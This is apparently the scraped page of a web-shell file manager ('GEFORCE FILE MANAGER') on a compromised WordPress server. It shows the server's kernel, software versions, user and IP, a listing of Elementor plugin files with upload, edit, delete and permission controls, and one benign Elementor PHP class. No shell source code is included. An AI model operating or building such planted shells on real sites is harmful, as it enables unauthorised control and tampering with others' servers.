[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
app
/
modules
/
import-export
/
runners
/
revert
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 revert-runner-base.php
596 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-settings.php
3,817 B
SET
[ EDIT ]
|
[ DEL ]
📄 taxonomies.php
779 B
SET
[ EDIT ]
|
[ DEL ]
📄 templates.php
374 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: revert-runner-base.php
<?php namespace Elementor\App\Modules\ImportExport\Runners\Revert; use Elementor\App\Modules\ImportExport\Runners\Runner_Interface; abstract class Revert_Runner_Base implements Runner_Interface { /** * By the passed data we should decide if we want to run the revert function of the runner or not. * * @param array $data * * @return bool */ abstract public function should_revert( array $data ): bool; /** * Main function of the runner revert process. * * @param array $data Necessary data for the revert process. */ abstract public function revert( array $data ); }